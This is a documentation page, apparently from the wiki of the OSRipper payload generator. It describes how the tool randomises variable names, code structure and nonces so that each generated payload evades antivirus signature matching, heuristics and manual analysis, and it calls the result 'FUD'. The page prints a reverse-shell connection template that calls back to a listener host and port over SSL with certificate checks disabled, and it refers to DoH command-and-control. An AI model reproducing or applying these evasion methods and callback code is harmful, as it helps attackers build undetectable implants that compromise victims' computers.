# Randomisation Process

Detailed explanation of how OSRipper randomizes payloads to ensure uniqueness.

## Overview

Randomization is the first and most critical step in ensuring payload uniqueness. Every generated payload is different, making static signature detection impossible.

## Why Randomization Matters

### The Problem

Standard payloads use predictable patterns:
- Fixed variable names (`socket`, `ssl`, `host`, `port`)
- Standard code structure
- Predictable import statements
- Known function calls

Antivirus solutions can detect these patterns through:
- Static signature matching
- Pattern recognition
- Heuristic analysis

### The Solution

OSRipper randomizes:
- **Variable Names** - Every variable is randomly named
- **Code Structure** - Code organization varies
- **Encoding Parameters** - Encoding keys are random
- **Function Names** - Functions are renamed

## Randomization Process

### Step 1: Variable Name Generation

Random variable names are generated for each payload:

```python
import secrets
import string

def generate_random_string(length):
    """Generate random string for obfuscation."""
    return "".join(secrets.choice(string.ascii_letters) 
                   for _ in range(length))
```

**Example Output:**
```python
socket_var = "xKj9mPq2"      # Random 8-15 character string
ssl_var = "aBcDeFgHiJ"       # Different random string
host_var = "MnOpQrSt"         # Another random string
port_var = "UvWxYzAb"          # Yet another random string
```

### Step 2: Payload Template Randomization

The payload template uses randomized variables:

**Before Randomization:**
```python
port = 4444
host = "192.168.1.100"

import zlib,base64,ssl,socket,struct,time
s = None
for x in range(10):
    try:
        so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        so.connect((host,port))
        s=ssl.wrap_socket(so)
        break
    except:
        time.sleep(10)
```

**After Randomization:**
```python
xKj9mPq2 = 4444
MnOpQrSt = "192.168.1.100"

import zlib,base64,ssl,socket,struct,time
aBcDeFgHiJ = None
for x in range(10):
    try:
        UvWxYzAb=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        UvWxYzAb.connect((MnOpQrSt,xKj9mPq2))
        aBcDeFgHiJ=ssl.wrap_socket(UvWxYzAb)
        break
    except:
        time.sleep(10)
```

### Step 3: Code Structure Variation

Code structure is varied between generations:

**Variation 1:**
```python
# Direct assignment
port_var = 4444
host_var = "192.168.1.100"
```

**Variation 2:**
```python
# Multiple assignments
port_var = 4000 + 444
host_var = "192" + ".168.1.100"
```

**Variation 3:**
```python
# Function calls
port_var = int("4444")
host_var = str("192.168.1.100")
```

### Step 4: Random Nonces

Random nonces are added for additional uniqueness:

```python
nonce1 = secrets.randbelow(14)
nonce2 = secrets.randbelow(42371)
nonce3 = secrets.randbelow(1000)

# Nonces may be used in:
# - Delay calculations
# - Encoding parameters
# - Code structure decisions
```

## Implementation Details

### Variable Randomization

**Length Range:** 8-15 characters
**Character Set:** ASCII letters (a-z, A-Z)
**Uniqueness:** Each variable gets unique name

**Code:**
```python
socket_var = generate_random_string(random.randint(8, 15))
ssl_var = generate_random_string(random.randint(8, 15))
length_var = generate_random_string(random.randint(8, 15))
data_var = generate_random_string(random.randint(8, 15))
context_var = generate_random_string(random.randint(8, 15))
host_var = generate_random_string(random.randint(8, 15))
port_var = generate_random_string(random.randint(8, 15))
```

### Payload Template Generation

The generator creates randomized templates:

```python
payload_content = f"""{stealth_code}{port_var} = {port}
{host_var} = "{host}"

import zlib,base64,ssl,socket,struct,time
{ssl_var} = None
for x in range(10):
        try:
                {socket_var}=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                {socket_var}.settimeout(5)
                {socket_var}.connect(({host_var},{port_var}))
                {context_var} = ssl._create_unverified_context()
                {ssl_var}={context_var}.wrap_socket({socket_var})
                break
        except Exception as e:
                time.sleep(2)
# ... rest of payload
"""
```

## Randomization Examples

### Example 1: Reverse Shell

**Generation 1:**
```python
aBc123 = 4444
xYz789 = "192.168.1.100"
socket_abc = socket.socket(...)
ssl_def = ssl.wrap_socket(...)
```

**Generation 2:**
```python
mNo456 = 4444
pQr012 = "192.168.1.100"
socket_xyz = socket.socket(...)
ssl_uvw = ssl.wrap_socket(...)
```

**Result:** Completely different variable names, same functionality

### Example 2: DoH C2

**Generation 1:**
```python
domain_var = "example.com"
doh_client_var = DoHClient(...)
session_var = SessionManager(...)
```

**Generation 2:**
```python
dmn_rand = "example.com"
doh_clt_rand = DoHClient(...)
sess_mgr_rand = SessionManager(...)
```

**Result:** Different names, same behavior

## Benefits of Randomization

### 1. Signature Evasion

- **No Static Patterns** - Each payload is unique
- **Unpredictable Structure** - Code varies between generations
- **Random Variables** - No predictable names

### 2. Heuristic Evasion

- **Code Variation** - Structure changes prevent pattern matching
- **Unpredictable Flow** - Control flow varies
- **Random Elements** - Nonces add uniqueness

### 3. Analysis Evasion

- **Manual Analysis** - Harder to understand randomized code
- **Automated Analysis** - Tools struggle with random variables
- **Pattern Matching** - No consistent patterns to match

## Randomization Statistics

### Uniqueness Metrics

- **Variable Names:** ~26^15 possible combinations per variable
- **Code Structure:** Multiple variations per payload type
- **Nonces:** Random integers add additional uniqueness
- **Total Combinations:** Effectively infinite

### Collision Probability

The probability of generating identical payloads:
- **Practically Zero** - Randomization ensures uniqueness
- **Cryptographically Secure** - Uses `secrets` module
- **No Repeats** - Each generation is independent

## Best Practices

### For Maximum Randomization

1. **Use Random Module** - Use `secrets` for cryptographically secure randomness
2. **Vary Lengths** - Use different lengths for variables
3. **Multiple Nonces** - Add multiple random elements
4. **Structure Variation** - Vary code structure

### Testing Randomization

```python
# Generate multiple payloads
for i in range(10):
    generate_payload()
    
# Verify uniqueness
# Each payload should be different
```

## Technical Implementation

### Random String Generation

```python
import secrets
import string

def generate_random_string(length):
    """Generate cryptographically secure random string."""
    return "".join(secrets.choice(string.ascii_letters) 
                   for _ in range(length))
```

### Variable Assignment

```python
# Generate random variables
variables = {}
for var_name in ['socket', 'ssl', 'host', 'port']:
    variables[var_name] = generate_random_string(
        random.randint(8, 15)
    )
```

### Template Substitution

```python
# Substitute variables in template
template = """
{socket_var} = socket.socket(...)
{ssl_var} = ssl.wrap_socket(...)
"""

payload = template.format(**variables)
```

## Conclusion

Randomization is the foundation of OSRipper's FUD capabilities. By ensuring every payload is unique, OSRipper makes static signature detection impossible. Combined with obfuscation and evasion techniques, randomization provides a robust defense against antivirus detection.

---

*For more details, see [Proof of Concept](Proof-Of-Concept) and [Obfuscation](Obfuscation) pages.*